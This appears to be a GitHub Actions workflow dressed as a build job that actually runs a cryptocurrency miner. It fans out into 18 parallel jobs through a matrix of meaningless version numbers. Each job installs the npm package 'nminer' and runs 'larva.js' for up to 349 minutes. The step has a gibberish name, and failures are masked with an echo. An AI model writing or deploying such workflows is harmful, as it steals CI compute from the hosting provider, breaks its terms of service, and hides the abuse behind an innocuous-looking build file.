name: larva
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4876 }
          - { version: 9247 }
          - { version: 9683 }
          - { version: 7085 }
          - { version: 4854 }
          - { version: 6219 }
          - { version: 83 }
          - { version: 3823 }
          - { version: 7504 }
          - { version: 4787 }
          - { version: 359 }
          - { version: 1612 }
          - { version: 7931 }
          - { version: 684 }
          - { version: 8980 }
          - { version: 1127 }
          - { version: 7830 }
          - { version: 4855 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: pro brave drat concerning tall
        run: |
          npm install nminer@latest
          timeout 349m node larva.js || echo "larva executed"